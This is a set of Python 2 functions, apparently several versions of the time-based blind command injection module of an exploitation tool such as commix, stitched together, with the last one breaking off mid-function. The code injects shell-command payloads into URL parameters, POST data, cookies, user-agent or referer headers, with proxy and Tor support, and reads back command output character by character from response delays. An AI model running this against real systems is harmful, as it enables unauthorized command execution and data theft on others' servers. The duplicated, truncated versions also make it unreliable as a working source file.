def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell): if menu.options.file_write or menu.options.file_upload : minlen = 0 else: minlen = 1 print "\n(*) Retrieving the length of execution output..." for j in range(int(minlen),int(maxlen)): # Execute shell commands on vulnerable host. if not alter_shell : payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) else: payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET) start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) #print target request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET sys.exit(1) else: try: response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET sys.exit(1)
def false_positive_check( separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, ): found_chars = False if menu.options.verbose: sys.stdout.write("\n(*) Testing the reliability of used payload... ") sys.stdout.flush() for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tfb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method ) else: payload = tfb_payloads.cmd_execution( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method ) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): # Get the execution ouput, of shell execution. if alter_shell: payload = tfb_payloads.fp_result_alter_shell( separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method ) else: payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write( "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL ) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return output
def injection( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, ): if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("\n(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): # Execute shell commands on vulnerable host. if alter_shell: payload = tfb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method ) else: payload = tfb_payloads.cmd_execution( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method ) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if menu.options.verbose: print "\n" else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") sys.stdout.flush() print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.write( "\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]" ) sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(32, 129): # Get the execution ouput, of shell execution. if alter_shell: payload = tfb_payloads.get_char_alter_shell( separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method ) else: payload = tfb_payloads.get_char( separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method ) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write( "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL ) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if not menu.options.verbose: output.append(chr(ascii_char)) percent = (num_of_chars * 100) / output_length float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2)) sys.stdout.write( "\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(float_percent) + "% ]" ) sys.stdout.flush() else: output.append(chr(ascii_char)) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) else: check_start = 0 sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n") sys.stdout.flush() check_how_long = 0 output = "" return check_how_long, output
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell): if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("\n(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): # Execute shell commands on vulnerable host. if not alter_shell: payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL) if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) else: start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) #print target request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str( err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str( err) + Style.RESET_ALL raise SystemExit() else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str( err) + Style.RESET_ALL raise SystemExit()
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell): if menu.options.file_write or menu.options.file_upload : minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("\n(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): # Execute shell commands on vulnerable host. if not alter_shell : payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL) if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) else: start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) #print target request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL raise SystemExit() else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL raise SystemExit()
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell): found_chars = False if menu.options.verbose: sys.stdout.write("\n(*) Testing the reliability of used payload... ") sys.stdout.flush() for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tfb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): # Get the execution ouput, of shell execution. if alter_shell: payload = tfb_payloads.fp_result_alter_shell( separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method) else: payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): # Execute shell commands on vulnerable host. if alter_shell: payload = tfb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if output_length > 1: if menu.options.verbose: print "\n" else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") sys.stdout.flush() print Style.BRIGHT + "(!) Retrieved " + str( output_length) + " characters." + Style.RESET_ALL found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]") sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(32, 129): # Get the execution ouput, of shell execution. if alter_shell: payload = tfb_payloads.get_char_alter_shell( separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method) else: payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if not menu.options.verbose: output.append(chr(ascii_char)) percent = ((num_of_chars * 100) / output_length) float_percent = "{0:.1f}".format( round( ((num_of_chars * 100) / (output_length * 1.0)), 2)) sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(float_percent) + "% ]") sys.stdout.flush() else: output.append(chr(ascii_char)) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) else: check_start = 0 if not menu.options.verbose: sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n") sys.stdout.flush() else: print "" check_how_long = 0 output = "" return check_how_long, output
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell): print "\n(*) Retrieving the length of execution output..." for j in range(1,int(maxlen)): # Execute shell commands on vulnerable host. if not alter_shell : payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) else: payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) #print target request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n(x) Error : " + str(err) sys.exit(1) else: response = urllib2.urlopen(request) response.read() # Check if defined method is POST. else : parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) response.read() except urllib2.HTTPError, err: print "\n(x) Error : " + str(err) sys.exit(1) else: